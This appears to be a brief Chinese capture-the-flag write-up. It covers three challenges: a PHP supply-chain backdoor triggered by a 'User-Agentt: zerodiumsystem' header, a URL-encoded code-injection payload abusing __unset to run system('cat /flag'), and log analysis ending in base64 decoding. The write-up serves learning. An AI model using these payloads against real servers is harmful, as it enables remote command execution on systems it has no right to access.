Web#

签到#

PHP 源码供应链攻击
HTTP header中加一项:
User-Agentt: zerodiumsystem(“cat /flag”);

unsetme#

unset触发__unset->clear。类似CVE-2020-5203,用$hive[]绕过过滤。
payload:
$hive[%27abc%27]);system(%27cat%20/flag%27);//%27]

Misc#

你会日志分析吗#

取最后select flag长度为377的记录,将字符串提取出来,base64解码得到flag。